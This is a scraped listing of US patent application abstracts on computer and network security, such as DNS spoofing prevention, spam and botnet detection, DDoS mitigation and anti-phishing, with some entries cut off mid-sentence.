20110231931METHOD AND DEVICE FOR PREVENTING DOMAIN NAME SYSTEM SPOOFING - A method for preventing Domain Name System (DNS) spoofing includes: performing uppercase/lowercase conversion for letters of a DNS question field in a DNS request packet according to a preset rule; sending the DNS request packet; receiving a DNS response packet; obtaining uppercase/lowercase distribution of the letters of the DNS question field in the DNS response packet; and forwarding the DNS response packet to a target DNS client if the uppercase/lowercase distribution of the letters of the DNS question field in the DNS response packet complies with the preset rule. Corresponding to the method, a device for preventing DNS spoofing is disclosed. The method and device reduce occupation of storage resources of the device.09-22-2011
20100154056Context-Aware Real-Time Computer-Protection Systems and Methods - A computer-implemented method for determining, in response to an event of interest, whether to perform a real-time file scan by examining the full context of the event of interest may comprise: 1) detecting an event of interest, 2) identifying at least one file associated with the event of interest, 3) accessing contextual metadata associated with the event of interest, 4) accessing at least one rule that comprises criteria for determining, based on the event of interest and the contextual metadata, whether to perform a security scan on the file, and then 5) determining, by applying the rule, whether to perform the security scan on the file. Corresponding systems and computer-readable media are also disclosed.06-17-2010
20090106836Equipment Monitoring Device - An equipment monitoring server is provided to prevent wrong acts in a local area network. An equipment monitoring server 04-23-2009
20090106837Module for Controlling Integrity Properties of a Data Stream - A module for controlling integrity properties of a data stream input into a device, such as a machine for manufacturing or a management system related to such machines. A plurality of control items are registered in a database. At least one activable control means executes a control of one integrity property according to one of several registered control items. A list is attached to the database with selectable links for activating at least one of the control means. Configuration means perform on at least one of the links a chronological selection according to a predefined management profile on integrity properties of the data stream in order to introduce a selectable relative time delay between activations of control items. Due to that configuration, the integrity control thus obtained is provided with high reliability as well as in a very flexible manner.04-23-2009
20090249482METHOD AND SYSTEM FOR DETECTING RESTRICTED CONTENT ASSOCIATED WITH RETRIEVED CONTENT - In embodiments of the present invention improved capabilities are described for contextual information caused to be attached to data as it passes through a series of computing devices, the contextual information relating to the series of computing devices. The data and the contextual information may then be scanned to determine if the data is a target data. In response to the identification of a target data, the contextual information may be communicated to a central repository. The contextual information may then be analyzed in relation to other information stored in the central repository to determine a target source.10-01-2009
20090205044APPARATUS, SYSTEM, AND METHOD FOR SECURE HARD DRIVE SIGNED AUDIT - An apparatus, system, and method are disclosed for secure hard disk signed audit. The apparatus is provided with a plurality of modules configured to functionally execute the necessary steps of monitoring interactions with an audited system, detecting an interrupt event corresponding to an auditable interaction, and logging an audit record for the auditable interaction in response to the interrupt event, wherein the audit record is logged in an access-restricted portion of a portion-securable hard disk. These modules in the described embodiments include a gate module, a detection module, and a logging module.08-13-2009
20090249483Command and Control Systems for Cyber Warfare - According to one embodiment, a method includes receiving data regarding a plurality of first parameters of a network. Each first parameter is mapped to a respective second parameter of a computer-readable cyber battle management language. The computer-readable cyber battle management language is operable to express an operational order in the form of a text-based instruction having a computational grammatical structure. The operational order is to be executed at least partially within the network and is related to cyber warfare. The computer-readable battle management language is also operable to express a situation report related to cyber warfare. The situation report is expressed in terms of one or more of the second parameters. The situation report may describe a change in one or more of the first parameters.10-01-2009
20090249481BOTNET SPAM DETECTION AND FILTRATION ON THE SOURCE MACHINE - A method and device are disclosed. In one embodiment the method includes determining that a packet attempting to be sent from a first computer system has at least a portion of a human communication message that may contain spam. The method then increments a spam counter when the difference in time between a first time value in a time stamp within the packet and a second time value of a most recent activity from a human input device coupled to the first computer system is greater than a threshold difference in time value. The method also disallows the packet to be sent to a remote location if the spam counter exceeds a spam outbound threshold value.10-01-2009
20090260081System and Method for Monitoring and Securing a Baseboard Management Controller - In certain embodiments, a method for monitoring and securing a baseboard management processor is provided. The method includes coupling to a baseboard management controller of a computer system via a console port, maintaining a persistent connection to the baseboard management controller, monitoring data from the console port, determining from the data whether an unauthorized access has occurred, and sending an alert if the unauthorized access has occurred.10-15-2009
20090260082Signature based authentication of the configuration of a configurable logic component - A configurable logic component is shown with a signature generator, responsive to a commanded configuration information signal from a processor, for providing a signed commanded configuration information signal, and with a memory device, responsive to the signed commanded configuration information signal from the signature generator, for storing the signed commanded configuration information signal in the configurable logic component for use by the processor in checking a current configuration of the configurable logic component against a trusted signed configuration file to ensure the current configuration matches the commanded configuration and allowing use of the configurable logic component in case of a match.10-15-2009
20090260080SYSTEM AND METHOD FOR VERIFICATION OF DOCUMENT PROCESSING DEVICE SECURITY BY MONITORING STATE TRANSISTIONS - The subject application is directed to a system and method for verification of document processing device security by monitoring of state transitions. State data is first acquired corresponding to a monitored sequence of states entered by a document processing device during operations and stored in an associated data storage. Authenticity data is thereafter generated representing the authenticity of the stored state data. State template data is then stored in the associated data storage corresponding to at least one acceptable sequence of states. Destination data is also stored in the associated data storage representing at least one preselected notification destination. A comparison is then performed of the acquired state data and the template state data. Notification data is then output based upon the result of the comparison of the state data and the state template data.10-15-2009
20100037314METHOD AND SYSTEM FOR DETECTING MALICIOUS AND/OR BOTNET-RELATED DOMAIN NAMES - A method and system of detecting a malicious and/or botnet-related domain name, comprising: reviewing a domain name used in Domain Name System (DNS) traffic in a network; searching for information about the domain name, the information related to: information about the domain name in a domain name white list and/or a domain name suspicious list; and information about the domain name using an Internet search engine, wherein the Internet search engine determines if there are no search results or search results with a link to at least one malware analysis site; and designating the domain name as malicious and/or botnet-related based on the information.02-11-2010
20110145920SYSTEM AND METHOD FOR ADVERSE MOBILE APPLICATION IDENTIFICATION - A system and method identifies mobile applications that can have an adverse effect on a mobile device or mobile network. In an implementation, a server monitors behavioral data relating to a mobile application and applies a model to determine if the application has an adverse effect or has the potential to cause an adverse effect on a mobile device or a network the mobile device may connect to. A mobile device may monitor behavioral data, apply a model to the data, and transmit a disposition to the server. The server may aggregate behavioral data or disposition information from multiple devices. The server may transmit or make available the disposition information to a subscriber through a web interface, API, email, or other mechanism. After identifying that an application may have an adverse effect, the server may enact corrective actions, such as generating device or network configuration data.06-16-2011
20110145919METHOD AND APPARATUS FOR ENSURING CONSISTENT SYSTEM CONFIGURATION IN SECURE APPLICATIONS - In exemplary embodiments, methods and apparatuses for securing electronic devices against tampering or unauthorized modifications are presented herein. One or more system locks may be installed in the system at a location between two or more subsystems along a communications path. Each system lock may be associated with a particular subsystem. The system locks may monitor the state of the system, including transactions targeting associated subsystems, and the transactions and/or state of the system may be compared to known valid transactions and states. If the requested transaction or enacted system state differs from a known acceptable transaction or state, a notification may be generated and countermeasures may be enacted. In some embodiments, the system locks may be located in a system bus on an electronic device to ensure that software executed on the electronic device remains free of tampering.06-16-2011
20110145918SENSITIVE DATA TRACKING USING DYNAMIC TAINT ANALYSIS - A system and method for tracking sensitive data uses dynamic taint analysis to track sensitive data as the data flows through a target application running on a computer system. In general, the system and method for tracking sensitive data marks data as tainted when the data input to the target application is indicated as sensitive. The system and method may then track the propagation of the tainted data as the data is read from and written to memory by the target application to detect if the tainted data is output from the application (e.g., leaked). Dynamic binary translation may be used to provide binary instrumentation of the target application for dynamic taint analysis to track propagation of the tainted data at the instruction level and/or the function level. Of course, many alternatives, variations, and modifications are possible without departing from this embodiment.06-16-2011
20090144821AUXILIARY METHOD FOR INVESTIGATING LURKING PROGRAM INCIDENTS - An auxiliary method for investigating lurking program incidents is disclosed. The method is to keep monitoring a plurality of processes run by a computer system and save process-invoking relationship data of each process being monitored when the process is created and terminated. Simultaneously, a system registry database of the computer system is also monitored and autostart-registered data of the programs is saved. Then correlate the process-invoking relationship data to the autostart-registered data for generating and saving process-invoking relationship log so as to extract and save high-level crucial clues of suspicious lurking programs. By the present method, only a little amount of high level crucial clues and process-invoking relationship log is collected and a few system resources is consumed for providing clear evidence that is helpful to investigation of lurking program incidents. Thus cost of time and labor for collecting and analyzing large amount of low-level logs is saved.06-04-2009
20080313733Optimization of Distributed Anti-Virus Scanning - Techniques for optimizing distributed anti-virus (AV) scanning are described. In one implementation, a message is received into a multi-node network that includes a plurality of distributed scanning tools. An acceptable scanning policy threshold is determined that is representative of a plurality of individual scanning policy configurations of the plurality of scanning tools. A determination is made whether the message has previously been scanned to the acceptable scanning policy threshold based on a single valued element. If the message has been previously scanned, the message is allowed to be communicated. Otherwise, the message is scanned at the acceptable scanning policy threshold. If the scanning is successful, then the message is marked as having been scanned, and is allowed to be communicated. If the scanning is unsuccessful, the message is prevented from being communicated.12-18-2008
20100162390Automatic proactive means and methods for substantially defeating a password attack - Automatic proactive means and methods for substantially defeating a password attack against a computer having a password-protected program installed in it. These means and methods range from not responding at all, to responding with instructions to disrupt the ability of the computer having the attack program in it to continue the attack.06-24-2010
20090260083SYSTEM AND METHOD FOR SOURCE IP ANTI-SPOOFING SECURITY - A system and method that provides for using source IP addresses and MAC addresses in a network to provide security against attempts by users of the network to use false source IP addresses in data packets. The system and method provide for analyzing MAC addresses and source IP addresses at the datalink (layer 2) level, and to use the information derived from such analysis to block access through a port where a host device is using a false, or spoofed, source IP address in transmitted data packets. Further, the system and method provide for validating initially learned source IP addresses, and for determining whether the number of unsuccessful attempts to validate new source IP addresses exceeds a threshold level, and where the number does exceed the threshold number the system and method can provide for operation in a possible attack mode.10-15-2009
20090260079INFORMATION PROCESSING DEVICE, AND METHOD THEREFOR - To provide an information processing device that can perform highly accurate tampering detection of distinguishing between an alteration by an administrator and significant tampering. The information processing device acquires content from a web server in accordance with an acquisition request for the content by a browser terminal. The information processing device includes: a conversion unit (10-15-2009
20080307524Detecting Public Network Attacks Using Signatures and Fast Content Analysis - Network worms or viruses are a growing threat to the security of public and private networks and the individual computers that make up those networks. A content sifting method if provided that automatically generates a precise signature for a worm or virus that can then be used to significantly reduce the propagation of the worm elsewhere in the network or eradicate the worm altogether. The content sifting method is complemented by a value sampling method that increases the throughput of network traffic that can be monitored. Together, the methods track the number of times invariant strings appear in packets and the network address dispersion of those packets including variant strings. When an invariant string reaches a particular threshold of appearances and address dispersion, the string is reported as a signature for suspected worm.12-11-2008
20080307525SYSTEM AND METHOD FOR EVALUATING SECURITY EVENTS IN THE CONTEXT OF AN ORGANIZATIONAL STRUCTURE - A system and method is provided for evaluating security threats to an enterprise network. The relative severities of security threats are determined, based in part, on the context of each threat within the enterprise network and in relation to the operation of a business. As a result, it is possible to prioritize security threats having the greatest magnitude and also threats that are directed against the most valuable business network devices. The invention comprises a plurality of network agents operating on a plurality of network devices for generating event messages. The event messages contain security data and are forwarded to an event manager for analysis. The event manager comprises an event correlator and an asset context manager. The event correlator detects security threats from the interrelationships between the security data contained in the event messages. In addition, the asset context manager utilizes business context knowledge specific to a particular business or business unit to determine a threat priority based on the importance of the threatened network device to the operation of the business.12-11-2008
20100175129METHOD FOR NOTIFICATION UPON EXPOSURE TO OFFENSIVE BEHAVIOURAL PATTERNS IN COLLABORATION - A system and method for protecting a user from offensive behavior in communications and notifying the user and/or an enforcement entity of the offensive behavior. The offensive content analysis system monitors communications between users for offensive behavior. The offensive content analysis system may measure the level of current offense in the communication and determine a historical offensive behavior pattern for the user. The offensive content analysis system may then determine if the offensive behavior, both current and historical, rises to a threshold behavior level. The offensive content analysis system may take notification action if the offensive behavior meets the threshold level.07-08-2010
20120246722BACKWARDS RESEARCHING ACTIVITY INDICATIVE OF PESTWARE - A system and method for researching an identity of a source of activity that is indicative of pestware is described. In one embodiment the method comprises monitoring, using a kernel-mode driver, API call activity on the computer; storing information related to the API call activity in a log; analyzing, heuristically, the API call activity to determine whether one or more weighted factors associated with the API call activity exceeds a threshold; identifying, based upon the API call activity, a suspected pestware object on the computer; identifying, in response to the identifying the suspected pestware object, a reference to an identity of an externally networked source of the suspected pestware object; and reporting the identity of the externally networked source to an externally networked pestware research entity.09-27-2012
20120246724SYSTEM AND METHOD FOR DETECTING AND DISPLAYING CYBER ATTACKS - A method, system, and computer program product for displaying detected cyber attacks over communications networks, including a radar type display section including one or more icons representing detected cyber attacks; an activity tracking display section including information regarding the detected cyber attacks represented by the icons; and an application information display section including at least one of system user information, session information, and statistics information regarding the cyber attacks.09-27-2012
20100162391Online Risk Mitigation - Online risk mitigation techniques are described. In an implementation, a service is queried for a reputation associated with an object from an online source in response to selection of the object. A backup of a client that is to receive the object is stored prior to obtaining the object when the reputation does not meet a threshold reputation level.06-24-2010
20100162392APPARATUS AND METHOD FOR MONITORING SECURITY STATUS OF WIRELESS NETWORK - An apparatus for monitoring the security status of a wireless network is provided. The apparatus includes a radio frequency (RF) signal collection unit which collects at least one piece of RF signal information; a security event information collection unit which collects security event information including at least one of traffic information and alert information; a security event information mapping unit which maps the RF signal information and the security event information based on the correlation between the RF signal information and the security event information; and a security event information display unit which displays the result of the mapping performed by the security event information mapping unit. Therefore, it is possible to allow a network administrator to intuitively recognize the security status of a wireless network by collecting RF signal information and security event information from the wireless network, mapping the RF signal information and the security event information based on the correlation therebetween and displaying the result of the mapping.06-24-2010
20100263047GROUP INTERCOM, DELAYED PLAYBACK, AND AD-HOC BASED COMMUNICATIONS SYSTEMS AND METHODS - Methods and apparatuses for escalating a problem with a personal communications device in a wireless communications network, each personal communications device having at least one communications session associated therewith, at least one process associated therewith, at least one IP address associated therewith and at least one personal communications device identification associated therewith. A problem is identified with a particular communication session associated with a particular personal communications device. The particular communications session is excluded from the wireless communications network. The device determines if the problem associated with the particular communications sessions has exceeded a problem threshold. If the problem associated with the particular communications sessions has exceeded a problem threshold, the exclusion of the particular communications session.10-14-2010
20120304288Modeling and Outlier Detection in Threat Management System Data - Methods, systems, and computer-readable media for identifying potential threats on a network based on anomalous behavior in communication between endpoints are provided. Traffic data for a network is accumulated over some period of time. The traffic data is grouped by one or more keys, such as source IP address, and sets of metric values are calculated for the keys. A mixture distribution, such as a negative binomial mixture distribution, is fitted to each set of metric values, and outlying metric values are determined based on the mixture distribution(s). A list of outliers is then generated comprising key values having outlying metric values in one or more of the sets of metric values.11-29-2012
20120304293SYSTEM AND METHOD FOR DOWNLOADING USER INTERFACE COMPONENTS TO WIRELESS DEVICES - A method of processing a user interface component is provided and includes receiving one or more user interface components that can be communicated to a wireless device. A component risk level for each of the one or more user interface components is determined and assigned to each of the one or more user interface components. Each of the one or more user interface components can be digitally signed using an embedded risk code that indicates the assigned risk level. Further, the component risk level can be selected from a plurality of component risk levels. In a particular embodiment, the component risk level can be determined based on the type of the user interface component. Further, the component risk level can be determined based on a developer of the user interface component.11-29-2012
20100186087PROCESSING PACKET STREAMS - Systems and methods are disclosed that includes a data-bus, system memory, a first processor arranged to receive an input stream, and a second processor programmed to apply one or more security algorithms to secure packets of the input stream to generate at least partially security-processed packets.07-22-2010
20120198550ELECTRONIC TRANSACTION RISK MANAGEMENT - A method of detecting unauthorized activity in an electronic message transfer system comprising a plurality of devices, each device being configured to generate and receive cryptographically secured transfer messages for exchanging content with other devices in the system. In each device, audit information is accumulated in a memory of the device. The device periodically forwards at least part of its accumulated audit information to a secure server.08-02-2012
20100180342Method for Using Extended Security System, Extended Security System and Devices - Embodiments of the present invention disclose a method for using an extended security system, including: configuring one of security processing devices in the extended security system as a primary security processing device and configuring other security processing devices as at least one secondary security processing device connected with the primary security processing device; the method further includes: when the extended security system receives an external packet, selecting, by the primary security processing device, a security processing device to process the received external packet, the selected security processing device being the primary security processing device or the secondary security processing device. The embodiments of the present invention also disclose an extended security system and a primary security processing device and secondary security processing devices. By data interaction between the security processing devices, resource sharing between the security processing devices can be implemented, thereby improving the performance of the extended security system.07-15-2010
20100218250NETWORK MONITORING APPARATUS, NETWORK MONITORING METHOD, AND NETWORK MONITORING PROGRAM - A traffic monitoring system (08-26-2010
20080209553Method for protecting data in a hard disk - The present invention discloses a method for protecting data in a hard disk, such that when a computer executes a power-on self test (POST) of a basic input/output system (BIOS), completes initialization of memories and calls an interrupt routine of the BIOS to read a hard disk area after initialization program codes of interface devices of all hard disk are executed, the computer will determine whether or not the hard disk has added a protection description data with a portion that matches with a computer identification code of the computer before accessing data in the hard disk.08-28-2008
20080209556METHOD AND DEVICE FOR VERIFICATION OF CODE MODULE IN VIRTUAL MACHINE - A method for pre-verification of a code module when the code module is installed or updated in a virtual machine, comprising: loading codes in the installed or updated code module; performing code verification on the codes in the code module; if the code verification is passed, generating a certificate of the code module; and storing the code module passing the code verification and its certificate. The present invention also discloses a method for verification of a code module at runtime of the code module in a virtual machine, comprising loading codes in the code module; generating a certificate of the code module based on the loaded codes; if the generated certificate of the code module and a pre-stored certificate of the code module are identical, verifying the code module to be valid; otherwise performing a pre-verification on the code module.08-28-2008
20090077660Security Module and Method for Controlling and Monitoring the Data Traffic of a Personal Computer - The invention disclosed herein relates to a security module (03-19-2009
20100154055Prefix Domain Matching for Anti-Phishing Pattern Matching - Phishing uniform resource locators are detected and/or filtered. After a uniform resource locator is received, it is determined if at least a portion of a prefix of the uniform resource locator matches at least a portion of a blacklist entry and the uniform resource locator is filtered if at least a portion of the prefix of the uniform resource locator matches at least a portion of the blacklist entry. The prefix of the uniform resource locator is constrained to be a predetermined number of the highest level domain labels of the domain name in the received uniform resource locator.06-17-2010
20100242112SYSTEM AND METHOD FOR PROTECTING NETWORK RESOURCES FROM DENIAL OF SERVICE ATTACKS - The present disclosure generally pertains to systems and methods for protecting network resources from denial of service attacks. In one exemplary embodiment, a responder stores an access filter value used to determine whether an incoming message frame has been transmitted from an authorized user. In this regard, a user communication device includes logic for determining the access filter value stored at the responder and includes the access filter value in a message frame transmitted from the computer to the responder. The responder compares the received access filter value to the stored access filter value. If such values match or otherwise correspond, the responder authenticates the message frame. However, if such values do not match or otherwise correspond, the responder discards the message frame. Thus, the responder processes authenticated message frames and discards unauthenticated message frames thereby preventing denial of service attacks from malicious users.09-23-2010
20100218251Detection of Artificially Generated System Load - A system and method are provided for detecting artificially generated load on a search system. The system may include a load monitoring component for monitoring a current load for comparison with an expected load. The system may additionally include an abnormality detection component for detecting an abnormality when the monitored load exceeds an expected amount by a predetermined threshold. The system may further include an analysis component for determining if the monitored load is an artificial load.08-26-2010
20100235908System and Method for Detection of a Change in Behavior in the Use of a Website Through Vector Analysis - A system and method for identifying the change of user behavior on a website includes analyzing the actions of users on a website comprising a plurality of parameters or parameters that identify the actions performed on a website including parameters or fields related to previous actions by that user or other users of the website. The parameters or fields are represented in a vector format where each vector represents a different session of activity on the website, page of the website, user of the website, or other attribute of the use of a website. Analysis is performed to determine if new sessions are similar or dissimilar to previously known sessions.09-16-2010
20100242110Widget Security - A widget security system, method and computer-readable medium detects a security event associated with a widget, assesses the risk associated with the security event, and initiates a security action based on the assessed risk.09-23-2010
20100235910SYSTEMS AND METHODS FOR DETECTING FALSE CODE - Systems and methods for detecting false code in web pages linked to a web site are provided. One system includes a web server for administering the web site and a surveillance server for collecting generated or updated web pages from among the web pages linked to the web site, selecting tags of a given tag type included in the collected web pages, determining whether the selected tags comprise false code, and providing the determination result to an administrator terminal such that an administrator can check the determination result. One method includes collecting web pages that were generated or updated within a set time period from among the web pages linked to the web site, determining whether tags included in the collected web pages comprise false code, and providing the determination result to an administrator terminal such that an administrator can check the determination result.09-16-2010
20100212011METHOD AND SYSTEM FOR SPAM REPORTING BY REFERENCE - Methods and systems for spam reporting by reference are described. In one embodiment, an electronic message may be received by a mobile electronic device. A spam report may be transmitted from the mobile electronic device to a report server. The spam report may notify the report server that the electronic message is spam and include a reference to the electronic message without including the electronic message itself. The reference may be usable to identify the received message.08-19-2010
20100212010SYSTEMS AND METHODS THAT DETECT SENSITIVE DATA LEAKAGES FROM APPLICATIONS - In embodiments, the present invention may be a computer program product embodied in a computer readable medium that, when executing on one or more computers, may select a software application for monitoring, where the selection may be based at least in part on the basis that the software application controls confidential information, and where the software application may be an end-point application, a web application, a cloud application, and the like. The present invention may monitor the software application by determining an output data quantity that may be written from the software application. The output data may then be compared with a predetermined quantity, where the predetermined quantity may be indicative of confidential information being written from the software application.08-19-2010
20100138921Countering Against Distributed Denial-Of-Service (DDOS) Attack Using Content Delivery Network - Method and apparatus for blocking a distributed denial-of-service (DDoS) attack are provided. It is first determined whether a traffic status of an origin server is based on the DDoS attack. When it is determined that the traffic status of the origin server is based on the DDoS attack, a DNS is requested to change an Internet protocol (IP) address of the origin server to the IP address of at least one of plural servers. Accordingly, it is possible to accept a normal service providing request and also to determined and block the DDoS attack. In addition, since a device for determining and blocking the DDoS attack need not be installed in each site or server, it is possible to efficiently determine and block the DDoS attack at reduced cost.06-03-2010
20100251364METHOD AND APPARATUS FOR CLASSIFYING HARMFUL PACKET - A network apparatus and method of classifying received packets based on a predetermined standard are disclosed. The method of classifying received packets in a security system, the method comprises parsing a received packet and extracting a payload from the parsed packet; scanning the payload to check whether or not a predetermined signature code is included in the payload; if it is determined from the result of the scanning that the predetermined signature code is included in the payload, generating a presumptive signature based on information included in the predetermined signature code; and determining whether or not the generated presumptive signature is identical with a signature corresponding to the predetermined signature code, and allocating an classification identifier (ID) to the received packet according to the result of the determination, thereby classifying the received packet according to the classification ID, wherein the predetermined signature code is formed by a part of the signature corresponding to the signature code. Accordingly, possible harmful packets such as attack packets can be classified at high speed, and thereby being blocked immediately.09-30-2010
20100251363MODIFIED FILE TRACKING ON VIRTUAL MACHINES - In embodiments of the present invention improved capabilities are described for tracking modified files on a virtual machine including the steps of identifying an altered disk sector, associating the altered disk sector with code that is operated in a virtual machine, and causing a malicious code scan to be performed on the code.09-30-2010
20100251362DYNAMIC SPAM VIEW SETTINGS - A method of displaying email messages to a user is provided. Spam classification information and meta data is associated with email messages received for a user. Email message summary information is displayed in a user interface based on whether the meta data associated with the message meets or exceeds a threshold display level for the summary information. The user provides input via the user interface which is an indication to change the threshold display level and the change is dynamically displayed.09-30-2010
20090249480MINING USER BEHAVIOR DATA FOR IP ADDRESS SPACE INTELLIGENCE - The claimed subject matter is directed to mining user behavior data for increasing Internet Protocol (“IP”) space intelligence. Specifically, the claimed subject matter provides a method and system of mining user behavior within an IP address space and the application of the IP address space intelligence derived from the mined user behavior.10-01-2009
20100125909MONITOR DEVICE, MONITORING METHOD AND COMPUTER PROGRAM PRODUCT THEREOF FOR HARDWARE - A monitor device, a monitor method and a computer program product thereof for hardware are disclosed. The hardware comprises a central processing unit (CPU) and a storage module. The monitor device comprises a retrieval module and an analysis module. The retrieval module is configured to retrieve the entry point information of a process before the process is executed, wherein the process comprises at least one instruction from the hardware. The analysis module is configured to retrieve an address corresponding to the process according to the entry point information. When the CPU executes the at least one instruction, the storage module records the at least one instruction according to the address.05-20-2010
20100050256METHODS AND SYSTEMS FOR INTERNET PROTOCOL (IP) PACKET HEADER COLLECTION AND STORAGE - A computer-based method for providing information about a potential security incident ascertained from received internet protocol (IP) packets is described. The method includes capturing IP packets from a computer network, stripping packet header data from the captured IP packets, reviewing the stripped packet header data for multiple occurrences of matching packet header data, and storing, in a database, only a single instance of packet header data for any reviewed packet header data that is determined to have occurred multiple times.02-25-2010
20100050255DETECTION AND SUPPRESSION OF SHORT MESSAGE SERVICE DENIAL OF SERVICE ATTACKS - A method, system, and medium are provided for suppressing a Short Message Service (SMS) induced Denial of Service (DoS) attack on a telecommunications network. A register is updated to include information relevant to SMS messages that are requested to be communicated by way of a wireless telecommunications network. The register includes information of the location where the target devices of SMS messages are located. The register is utilized to detect an SMS induced DoS attack. A trigger is communicated to an SMS router to enable a DoS mode that restricts the communication of SMS messages. In an exemplary embodiment, only those SMS messages identified as part of the DoS attack are restricted.02-25-2010
20100138920METHOD AND SYSTEM FOR DETECTING AND RESPONDING TO HARMFUL TRAFFIC - There is provided a method and system for detecting and responding to harmful traffic. The system includes a router determining whether or not received data is harmful traffic, by using a dynamic flow identification (DFI) function and a deep packet inspection (DPI) function, sending Cflowd information of the received data, and then encapsulating the received data when the received data is determined to be harmful traffic, a policy & resource control entity receiving the Cflowd information from the router, determining whether or not the received data is harmful traffic by using the received Cflowd information, and then sending a result of the determination to the router, and a security management server receiving the encapsulated data from the router, reconfirming whether or not the encapsulated data is harmful traffic, and then processing the encapsulated data.06-03-2010
20100083377METHOD AND APPARATUS TO DEFINE THE SCOPE OF A SEARCH FOR INFORMATION FROM A TABULAR DATA SOURCE - A method and apparatus for defining the scope of a search is described. In one embodiment, user input is received, and the scope is defined, based on the user input, for a search of free-form text for information from any random rows within a tabular structure of source data. In one embodiment, the search is intended for finding, in the free-form text, a sub-set of data fragments that matches information from any single row within the tabular structure of the source data.04-01-2010
20110113489SYSTEM AND METHOD FOR MITIGATING A DENIAL OF SERVICE ATTACK IN A SUBSCRIBER NETWORK - A system and method for mitigating a denial of service attack in a subscriber network. A traffic monitor monitors bandwidth usage of a subscriber network that is directed to a particular port. The traffic monitor detects excessive traffic based on preset thresholds or algorithms. When excessive traffic is detected, the traffic monitor may obtain the source IP address from headers in the packet stream and identify the device or devices from which the packets were delivered to the network. Using the IP addresses of affected devices, a policy may be implemented to throttle packets originating from those devices that are directed to the particular port.05-12-2011
20130219492SYSTEM FOR FINDING CODE IN A DATA FLOW - A code finder system deployed as a software module, a web service or as part of a larger security system, identifies and processes well-formed code sequences. For a data flow that is expected to be free of executable or interpreted code, or free of one or more known styles of executable or interpreted code, the code finder system can protect participants in the communications network. Examples of payload carried by data flows that can be monitored include, but are not limited to, user input data provided as part of interacting with a web application, data files or entities, such as images or videos, and user input data provided as part of interacting with a desktop application.08-22-2013
20100077477AUTOMATIC MANAGING SYSTEM AND METHOD FOR INTEGRITY REFERENCE MANIFEST - The present invention relates to a system for automatically managing integrity reference information and a method of managing the same. The system includes one or more systems, a system management server, and an integrity management server. The systems are connected over a network and communication with each other. Each of the systems has an integrity measurement program to generate integrity information. The system management server has registration information about each of the systems connected over the network and registration information about a program distributed to each of the systems. Further, the system management server controls network access by each of the systems. If integrity reference information matching integrity information provided from a specific system does not exist in pieces of integrity reference information for verifying integrity of each of the systems, the integrity management server determines whether to register the integrity information as integrity reference information of the specific system depending on whether the specific system has been registered with the system management server.03-25-2010
20120144484METHODS, MEDIA, AND SYSTEMS FOR DETECTING AN ANOMALOUS SEQUENCE OF FUNCTION CALLS - Methods, media, and systems for detecting an anomalous sequence of function calls are provided. The methods can include compressing a sequence of function calls made by the execution of a program using a compression model; and determining the presence of an anomalous sequence of function calls in the sequence of function calls based on the extent to which the sequence of function calls is compressed. The methods can further include executing at least one known program; observing at least one sequence of function calls made by the execution of the at least one known program; assigning each type of function call in the at least one sequence of function calls made by the at least one known program a unique identifier; and creating at least part of the compression model by recording at least one sequence of unique identifiers.06-07-2012
20120144481HOST IP REPUTATION - Various embodiments described above are directed to identifying abuse-hosting services at their source, rather than using such intermediaries as URLs and associated domains. In one or more embodiments, threats can be blocked by using the Internet protocol (IP) address of an identified attacker that is hosting content associated with abuse.06-07-2012
20090271862DETERMINING THE DEGREE OF RELEVANCE OF DUPLICATE ALERTS IN AN ENTITY RESOLUTION SYSTEM - An entity resolution system and alert analysis system configured to process inbound identity records and to generate alerts based on relevant identities, entities, conditions, activities, or events is disclosed. One process of resolving identity records and detecting relationships between entities may be performed using a pre-determined or configurable entity resolution rules. Further, the entity resolution system may include an alert analysis system configured to allow analysts to review and analyze alerts, entities, and identities, as well as provide comments or assign a disposition to alerts generated by the entity resolution system. Furthermore, the entity resolution system may be configured to handle duplicate alerts, i.e., one or more identical or near-identical alerts generated using the same entities and/or identities as well as assign a relevance score to the particular entities and identities included in the alert.10-29-2009
20100263045SYSTEM FOR RECLASSIFICATION OF ELECTRONIC MESSAGES IN A SPAM FILTERING SYSTEM - A method for indicating probability of spam for email comprises tracking network traffic characteristics for the email, and comparing the tracked characteristics for the email to characteristics for email from trusted or known spam sources.10-14-2010
20110067104METHOD OF SECURING EXECUTION OF A PROGRAM - A method of securing execution of a main program that implements nested functions, the method comprising the steps of executing a security management program arranged to update a list of current functions, informing the security management program of the beginning of execution of each function of the main program and updating the list of current functions, informing the security management program of the end of execution of each function, and, after being informed of each end of execution of a function, verifying that the function is indeed the function that was begun the most recently.03-17-2011
20110067103ROUTER FOR PREVENTING PORT SCANS AND METHOD UTILIZING THE SAME - A router and method for preventing port scans using a router includes receiving a datagram from a remote computer, transferring the datagram to a local computer, and receiving a response datagram from the local computer. The router and method further includes dropping the response datagram if the response datagram is an Internet Control Messages Protocol (ICMP) port unreachable datagram and the ICMP port unreachable datagram is abnormal, and recording a port scan event of the remote computer into the log system.03-17-2011
20110067102Outgoing email check system, check data providing apparatus, check data inspecting apparatus, and outgoing email check method - To allow inspecting whether a security check of a planned outgoing email is finished in an outgoing email check system, a check data providing apparatus 03-17-2011
20110067101Individualized Time-to-Live for Reputation Scores of Computer Files - An individualized time-to-live (TTL) is determined for a reputation score of a computer file. The TTL is determined based on the reputation score and the confidence in the reputation score. The confidence can be determined based on attributes such as the reputation score, an age of the file, and a prevalence of the file. The reputation score is used to determine whether the file is malicious during a validity period defined by the TTL, and discarded thereafter.03-17-2011
20090222919METHOD AND SYSTEM FOR CONTENT CATEGORIZATION - The invention discloses a method and system for content categorization, which aims at reducing the processing burthen of the content categorization as well as the network transmission traffic. The method comprises: transmitting, by a content categorization requester, a content digest of a content to be categorized to a content categorization provider; and performing, by the content categorization provider, content categorization according to the content digest. The device for requesting content categorization comprises: a digest operation determination component, adapted to determine whether it is necessary to obtain a content digest of a content to be categorized; a digest obtaining component, adapted to obtain the content digest of the content to be categorized when the digest operation determination component determines it necessary to obtain the content digest of the content to be categorized; and a first transmit component, adapted to transmit the content digest obtained by the digest obtaining component.09-03-2009
20080313732Preventing the theft of protected items of user data in computer controlled communication networks by intruders posing as trusted network sites - Theft of protected items of user data from intrusion and theft, e.g. phishing in protected by maintaining a first listing, associated with said with a user display terminal, of protected user data items; and maintaining a second listing, associated with the display terminal, of the addresses of trusted network sites to which each of said protected user data items may be transmitted. The when a there is an initiation of a transmission of a protected item from said user display terminal to a selected non-trusted network site as determined by comparison of the two lists, the user is given an alert of his proposed transmission to a non-trusted site. The transmission is prohibited until the user decides to either cancel or proceed with the transmission.12-18-2008
